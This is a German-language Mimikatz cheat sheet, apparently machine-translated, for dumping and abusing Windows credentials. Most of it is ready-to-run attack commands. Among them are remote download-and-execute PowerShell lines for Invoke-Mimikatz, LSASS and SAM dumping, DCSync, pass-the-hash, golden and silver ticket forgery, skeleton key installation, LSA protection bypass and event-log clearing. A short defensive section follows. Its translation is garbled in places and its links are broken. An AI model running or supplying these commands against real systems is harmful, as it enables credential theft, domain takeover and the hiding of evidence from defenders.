Zum Inhalt

Mimikatz Cheat Sheet

Überblick

Mimikatz ist ein leistungsfähiges Anmelde- und Manipulationswerkzeug von Benjamin Delpy (@gentilkiwi). Es kann Klartext-Passwörter, Hashes, PIN-Codes und Kerberos-Tickets aus dem Speicher extrahieren, sowie verschiedene Angriffe wie Pass-the-Hash, Pass-the-Ticket und goldene Ticket-Erstellung durchführen.

ZEIT Warning: Mimikatz ist ein Sicherheitstest-Tool, das schädlich verwendet werden kann. Verwenden Sie es nur in Umgebungen, in denen Sie eine ausdrückliche Erlaubnis dazu haben.

Mimikatz erhält

Offizielles Projekt

  • GitHub: [https://github.com/gentilkiwi/mimikatz](https://github.com/gentilkiwi/mimikatz]
  • Neueste Veröffentlichung: [https://github.com/gentilkiwi/mimikatz/releases](https://github.com/gentilkiwi/mimikatz/releases

Vorkompilierte Binäre

  • mimikatz.exe - 32-Bit ausführbar
  • mimikatz_trunk.zip - Enthält sowohl 32-Bit als auch 64-Bit Ausführbare

Zusammenstellung aus Quelle

git clone https://github.com/gentilkiwi/mimikatz.git
# Open the solution file in Visual Studio and build
```_

## Basisnutzung

### Laufende Mimikatz
```powershell
# Run directly
mimikatz.exe

# Run with PowerShell
powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz"

# Run from memory
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
```_

### Vorrechte erhöhen

privilege::debug


### Hilfe bekommen

help :: :: /?


### Ausführen von Mimikatz

exit


## Kernmodule und Befehle

### sekurlsa Modul (LSASS Memory Access)

|  | Command | Description |  |
| --- | --- |
|  | `sekurlsa::logonpasswords` | Extract all logon passwords |  |
|  | `sekurlsa::tickets` | Extract Kerberos tickets |  |
|  | `sekurlsa::ekeys` | Extract Kerberos encryption keys |  |
|  | `sekurlsa::dpapi` | Extract DPAPI master keys |  |
|  | `sekurlsa::credman` | Extract credentials from Windows Credential Manager |  |
|  | `sekurlsa::msv` | Extract MSV authentication information |  |
|  | `sekurlsa::tspkg` | Extract TSPKG authentication information |  |
|  | `sekurlsa::wdigest` | Extract WDigest authentication information |  |
|  | `sekurlsa::kerberos` | Extract Kerberos authentication information |  |
|  | `sekurlsa::ssp` | Extract SSP authentication information |  |
|  | `sekurlsa::livessp` | Extract LiveSSP authentication information |  |
|  | `sekurlsa::cloudap` | Extract CloudAP authentication information |  |

### lsadump Module (SAM und Active Directory)

|  | Command | Description |  |
| --- | --- |
|  | `lsadump::sam` | Extract hashes from the SAM database |  |
|  | `lsadump::secrets` | Extract LSA secrets |  |
|  | `lsadump::cache` | Extract cached domain credentials |  |
|  | `lsadump::dcsync` | Perform DCSync attack to retrieve password data |  |
|  | `lsadump::lsa` | Extract LSA secrets |  |
|  | `lsadump::trust` | Extract domain trust keys |  |
|  | `lsadump::backupkeys` | Extract domain backup keys |  |

### kerberos Modul (Ticket Manipulation)

|  | Command | Description |  |
| --- | --- |
|  | `kerberos::list` | List all Kerberos tickets |  |
|  | `kerberos::purge` | Purge all Kerberos tickets |  |
|  | `kerberos::ptt` | Pass-the-ticket (inject a ticket) |  |
|  | `kerberos::golden` | Create a golden ticket |  |
|  | `kerberos::silver` | Create a silver ticket |  |
|  | `kerberos::tgt` | Create a TGT |  |
|  | `kerberos::hash` | Calculate Kerberos keys from password |  |

### crypto Module (Cryptographic Operations)

|  | Command | Description |  |
| --- | --- |
|  | `crypto::certificates` | List certificates |  |
|  | `crypto::keys` | List keys |  |
|  | `crypto::system` | List system certificates |  |
|  | `crypto::capi` | List CAPI certificates |  |
|  | `crypto::cng` | List CNG certificates |  |
|  | `crypto::stores` | List certificate stores |  |

### vault Module (Windows Vault Access)

|  | Command | Description |  |
| --- | --- |
|  | `vault::cred` | List credentials in Windows Vault |  |
|  | `vault::list` | List vault credentials |  |

### Token Modul (Token Manipulation)

|  | Command | Description |  |
| --- | --- |
|  | `token::whoami` | Display current token information |  |
|  | `token::list` | List all tokens |  |
|  | `token::elevate` | Elevate token privileges |  |
|  | `token::revert` | Revert token |  |
|  | `token::run` | Run a process with a token |  |

### Privileg Modul (Privilege Management)

|  | Command | Description |  |
| --- | --- |
|  | `privilege::debug` | Enable debug privilege |  |
|  | `privilege::driver` | Load a driver |  |

### Veranstaltungsmodul (Event Log Management)

|  | Command | Description |  |
| --- | --- |
|  | `event::clear` | Clear event logs |  |
|  | `event::drop` | Drop event logs |  |

### ts Modul (Terminal Services)

|  | Command | Description |  |
| --- | --- |
|  | `ts::sessions` | List terminal services sessions |  |
|  | `ts::multirdp` | Enable multiple RDP sessions |  |

### Sonstiges Modul (Sonstiges)

|  | Command | Description |  |
| --- | --- |
|  | `misc::cmd` | Command prompt |  |
|  | `misc::regedit` | Registry editor |  |
|  | `misc::taskmgr` | Task manager |  |
|  | `misc::ncroutemon` | Network connection route monitor |  |
|  | `misc::detours` | Detours detection |  |
|  | `misc::skeleton` | Install skeleton key |  |

## Gemeinsame Angriffstechniken

### Einführendes Dumping

#### Logon-Passwörter extrahieren

privilege::debug sekurlsa::logonpasswords


#### Extrahieren Sie Credentials von SAM

privilege::debug token::elevate lsadump::sam


#### Auszug Cached Domain Credentials

privilege::debug lsadump::cache


#### Auszug aus LSASS Dump

Create dump with Task Manager or procdump

sekurlsa::minidump lsass.dmp sekurlsa::logonpasswords


### Pass-the-Hash Angriffe

#### Pass-the-Hash mit NTLM

sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:E52CAC67419A9A224A3B108F3FA6CB6D


#### Pass-the-Hash mit AES Schlüssel

sekurlsa::pth /user:Administrator /domain:contoso.local /aes256:E52CAC67419A9A224A3B108F3FA6CB6D1234567890ABCDEF1234567890ABCDEF


#### Over-Pass-the-Hash (Convert NTLM to Kerberos)

sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:E52CAC67419A9A224A3B108F3FA6CB6D /run:powershell.exe


### DCSync Attack

#### NTLM Hashes für alle Benutzer extrahieren

lsadump::dcsync /domain:contoso.local /all


#### Extrahieren NTLM Hash für bestimmte Benutzer

lsadump::dcsync /domain:contoso.local /user:Administrator


#### NTLM Hash für KRBTGT (für Golden Ticket)

lsadump::dcsync /domain:contoso.local /user:krbtgt


### Kerberos Ticketangriffe

#### Kerberos Tickets kaufen

kerberos::list


#### Erstellen Sie ein Golden Ticket

Format: kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:KRBTGT_HASH /ticket:OUTPUT_FILE

kerberos::golden /user:Administrator /domain:contoso.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:HASH /ticket:golden.kirbi


#### Erstellen Sie ein Silver Ticket

Format: kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /target:SERVER /service:SERVICE /rc4:SERVICE_HASH /ticket:OUTPUT_FILE

kerberos::golden /user:Administrator /domain:contoso.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /target:server.contoso.local /service:HTTP /rc4:HASH /ticket:silver.kirbi


#### Pass-the-Ticket

kerberos::ptt golden.kirbi


#### Tickets kaufen

kerberos::purge


### Skelett Schlüsselangriff

privilege::debug misc::skeleton


## Erweiterte Techniken

### DPAPI Master Key Extraction

sekurlsa::dpapi


### LSA Schutz Bypass

Load mimikatz driver

mimidrv::service

Enable debug privilege

privilege::debug

Load driver

!+

Remove LSASS protection

!processprotect /process:lsass.exe /remove

Extract credentials

sekurlsa::logonpasswords


### Fernsteuerung

Create process dump of LSASS

Using Task Manager or procdump:

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Analyze dump file

sekurlsa::minidump lsass.dmp sekurlsa::logonpasswords


### Extrahieren Sie Credentials von Windows Credential Manager

vault::cred vault::list


### Domain-Backup Schlüssel extrahieren

lsadump::backupkeys /system:dc01.contoso.local /export


## Kommandobeispiele mit Parameter

### sekurlsa::

sekurlsa::logonpasswords [/patch]


### sekurlsa::

sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH [/run:COMMAND] sekurlsa::pth /user:USERNAME /domain:DOMAIN /aes128:HASH [/run:COMMAND] sekurlsa::pth /user:USERNAME /domain:DOMAIN /aes256:HASH [/run:COMMAND]


### lsadump::

lsadump::dcsync /domain:DOMAIN /user:USERNAME [/guid:\\{object-guid\\}] lsadump::dcsync /domain:DOMAIN /all [/csv]


### kerberos::

kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:HASH [/id:USER_ID] [/groups:GROUP_IDS] [/ticket:OUTPUT_FILE]


### kerberos::

kerberos::ptt TICKET_FILE


## Defensive Maßnahmen

### Nachweismethoden
- Monitor für die Prozesserstellung von mimikatz.exe oder verdächtige Prozesse auf lsass zugreifen. ex
- Monitor für verdächtige LSASS Speicherzugriff
- Monitor für DCSync-Betriebe (Replikationsanfragen von Nicht-DC-Maschinen)
- Monitor für Ticketerstellung und Manipulation
- Monitor für Privilegeskalation

### Präventionsmethoden
- LSA-Schutz aktivieren (RunAsPPL)

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1 /f

- Ermöglichen Credential Guard (Windows 10/Server 2016+)
- Implement geschützt Benutzergruppe
- Deaktivieren der WDigest-Authentifizierung

reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 0 /f

```_ - Implementierung Just Enough Administration (JEA) - Regelmäßige Passwortdrehung - Verwaltungsrechte beschränken - Verwenden Sie starke Passwörter

Ressourcen

  • Official GitHub Repository
  • [Mimikatz Wiki](_LINK_8___
  • [ADSecurity Mimikatz Guide](__LINK_8___
  • [MITRE ATT&CK; - Credential Dumping](_LINK_8___
  • [MITRE ATT&CK; - Pass the Hash](LINK_8
  • [MITRE ATT&CK; - Passen Sie das Ticket](_LINK_8__